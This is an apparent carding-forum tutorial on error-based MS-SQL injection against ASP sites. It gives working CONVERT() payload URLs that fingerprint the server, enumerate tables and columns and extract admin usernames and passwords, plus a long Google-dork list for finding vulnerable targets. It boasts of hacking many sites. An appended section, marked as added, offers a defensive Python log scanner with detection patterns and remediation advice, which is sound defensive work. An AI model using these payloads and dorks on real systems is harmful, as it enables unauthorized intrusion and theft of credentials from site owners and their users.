[TUT] MS-SQL INJECTION.....asp [full]



CardingMafia Admin
03-17-2012, 03:58 PM
We hacked lots of MySQL sites... now it's time to target Microsoft.

Hope you will enjoy it....

Let's start...

There are various types of SQL injection for Microsoft, as follows:

1) ODBC Error Message Attack with "CONVERT"
2) ODBC Error Message Attack with "HAVING" and "GROUP BY"
3) MSSQL Injection with UNION Attack
4) MSSQL Injection in Web Services (SOAP Injection)
5) MSSQL Blind SQL Injection Attack

I will be explaining the various methods of SQLi in my various tuts..
So for now we will start with the easiest method of SQLi, with CONVERT.

STEP 1:
First we need to find a vulnerable site.

By adding a single quote ('), double quote (") or a semicolon (;) to the field under test.

eg
http://www.example.com/news.asp?id=10'
http://www.example.com/news.asp?id=10;

It's vulnerable to SQL injection if the output shows some error like this:

[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------

Also the error could be something like below:

Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4

If errors like the above are shown, then the site could be vulnerable to SQL injection.

Also you can find vulnerable sites from Google dorks.

eg

inurl:page.asp?id=
inurl:index.asp?sid=

Code:
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID="
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="
STEP 2:

Now we have got our vulnerable website.
The CONVERT command is used to convert between two data types, and when the specific
data cannot be converted to the other type an error will be returned.

Now we start our assessment by finding the MSSQL version and the DB name.

http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)

[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

/includes/templates/header.asp, line 21

-----------------------------------------------------------

We know now it's Microsoft SQL Server 2005 and the OS is Windows 2003 Server (Build 3790: Service Pack 2).

Let's go on to enumerate the DB name.

http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--

[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'IPC' to data type int.

/includes/templates/header.asp, line 21
------------------------------------------------------------

The database name is IPC.

http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'ipcdc' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

The user operating the database is ipcdc....

STEP 3:
NOW LET'S FIND THE TABLES IN THE DATABASE

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--

"information_schema.tables" stores information about the tables in the databases, and there is a field called "table_name"
which stores the name of each table. "SELECT TOP 1" will show the first table in the database.
The result of this request is something like this:

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'siteStatus' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Therefore, we know the first table = "siteStatus" from this error. The next step is looking for the second table.
We only append a WHERE clause to the query in the above request.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Second table: 'headerGraphic'
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
Third table: 'admin'

Like this you will get each table name from the error.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic','admin')))--

If the query returns something like this:

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

IT MEANS THE DATABASE CONTAINS ONLY 3 TABLES: 'siteStatus', 'headerGraphic' and 'admin'.

STEP 4:
Now we are all set..... and we will find the columns in the admin table.

We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name",
but we have to add "table_name" in the WHERE clause in order to specify the table which we will pull the column names from.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'+and+column_name+not+in+('username')))--

The response will be:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'passwd' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
So the 2nd column is 'passwd'.


DO THIS LIKE WE DID THE URL MANIPULATION FOR TABLES....
DON'T FORGET TO ADD THE WHERE CLAUSE.
UNTIL YOU GET AN ERROR LIKE THIS:
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

STEP 5: RETRIEVING USERNAME and PASSWORD etc.

Now let's see what we got from above:

table_name: 'admin', 'siteStatus' and 'HeaderGraphic'

Here we are interested in 'admin'. So we found the columns of 'admin':

column_name: 'username' and 'passwd'

LET'S do our work now

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+username+from+admin))--
You will get the first username in the form of an error,
eg sa_admin
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+passwd+from+admin))--

You will get the passwd.
eg comic123


So you own..... the MSSQL server with

USERNAME: sa_admin
PASSWORD: comic123
[note:
1) you can use AND/OR both
2) Don't forget the , (comma) after 'int' in convert()
3) In the error, after the ' (upper comma) is your table_name or column_name etc.
4) you can enumerate more usernames and passwords by using the 'not' command
]
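Added example, not code from the original post: the detection side of the technique described above. Every request in the tutorial carries the same tell-tale substrings once the query string is URL-decoded (convert(int, ..., information_schema.tables / information_schema.columns, @@version / db_name() / user_name(), a trailing -- or ;, or a bare quote appended to a numeric id), and every "successful" step depends on the application returning the raw OLE DB / ODBC driver error to the client. The script below scans IIS W3C extended log lines for those request indicators and checks a response body for the verbose error strings shown in the post. The log layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status), the sample lines, and the client IP are all constructed for this example; real IIS logs may have more fields, so adjust IIS_FIELDS to match the #Fields header of the log you are reading.

```python
"""Defender-side checks for CONVERT()-style error-based MSSQL injection.

Added example; not part of the original post. Log layout and sample data
are constructed for illustration.
"""
import re
from urllib.parse import unquote_plus

# Indicators keyed on what the tutorial's requests contain after URL decoding.
# Matching is case-insensitive because T-SQL keywords and function names are.
REQUEST_INDICATORS = [
    ("convert_int_probe", re.compile(r"convert\s*\(\s*int\s*,", re.I)),
    ("schema_enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("server_fingerprint", re.compile(r"@@version|db_name\s*\(|user_name\s*\(", re.I)),
    ("tautology_and", re.compile(r"\band\s+1\s*=", re.I)),
    ("comment_terminator", re.compile(r"--\s*$|;\s*$")),
    ("quote_probe", re.compile(r"^\d+['\";]\s*$")),  # checked per parameter value
]

# Substrings of the error pages reproduced in the post. Any of these in a
# response body means driver errors are being leaked to the client, which is
# the condition that makes the whole technique work.
ERROR_LEAK_MARKERS = (
    "Microsoft OLE DB Provider for ODBC Drivers error",
    "Microsoft OLE DB Provider for SQL Server error",
    "[ODBC SQL Server Driver][SQL Server]",
    "Unclosed quotation mark",
    "Conversion failed when converting the nvarchar value",
    "ADODB.Field error",
)

# Assumed (constructed) IIS W3C extended log layout for this example.
IIS_FIELDS = ["date", "time", "c_ip", "method", "uri_stem", "uri_query", "status"]


def parse_iis_line(line):
    """Split one W3C log line into a dict; return None for comments, blanks, or odd rows."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(IIS_FIELDS):
        return None
    rec = dict(zip(IIS_FIELDS, parts))
    rec["uri_query"] = "" if rec["uri_query"] == "-" else rec["uri_query"]
    return rec


def query_indicators(raw_query):
    """Return the names of indicators present in a URL-encoded query string.

    The quote probe is tested per parameter value so 'id=10'' is caught even
    when the other parameters are clean; the rest are tested on the whole
    decoded string because the payload may span several '+'-separated tokens.
    """
    decoded = unquote_plus(raw_query)
    values = [kv.split("=", 1)[1] if "=" in kv else kv for kv in decoded.split("&") if kv]
    found = []
    for name, rx in REQUEST_INDICATORS:
        targets = values if name == "quote_probe" else [decoded]
        if any(rx.search(t) for t in targets):
            found.append(name)
    return found


def scan_iis_log(lines):
    """Return one finding per suspicious request as (client ip, uri stem, indicator names)."""
    findings = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        hits = query_indicators(rec["uri_query"])
        if hits:
            findings.append((rec["c_ip"], rec["uri_stem"], hits))
    return findings


def leaks_db_error(response_body):
    """True if a response body exposes driver error text to the client."""
    return any(marker in response_body for marker in ERROR_LEAK_MARKERS)


# Constructed sample log: one clean request, then a quote probe, a version
# probe, a table enumeration and a credential pull shaped like the post's URLs.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-03-17 15:58:01 203.0.113.7 GET /news.asp id=10 200
2012-03-17 15:58:05 203.0.113.7 GET /news.asp id=10' 500
2012-03-17 15:58:09 203.0.113.7 GET /page.asp id=1+and+1=convert(int,@@version) 500
2012-03-17 15:58:14 203.0.113.7 GET /page.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2012-03-17 15:58:20 203.0.113.7 GET /page.asp id=1+and+1=convert(int,(select+top+1+passwd+from+admin))-- 500
""".splitlines()

if __name__ == "__main__":
    for ip, stem, hits in scan_iis_log(SAMPLE_LOG):
        print(f"{ip} {stem}: {', '.join(hits)}")
```

The error-leak check is the more important of the two for remediation: the log scanner only tells you an enumeration was attempted, whereas a positive leaks_db_error() on your own error page means the attempt returned data. Turning off detailed ASP error messages to remote clients and moving the query to parameterized commands removes both the disclosure channel and the injection itself.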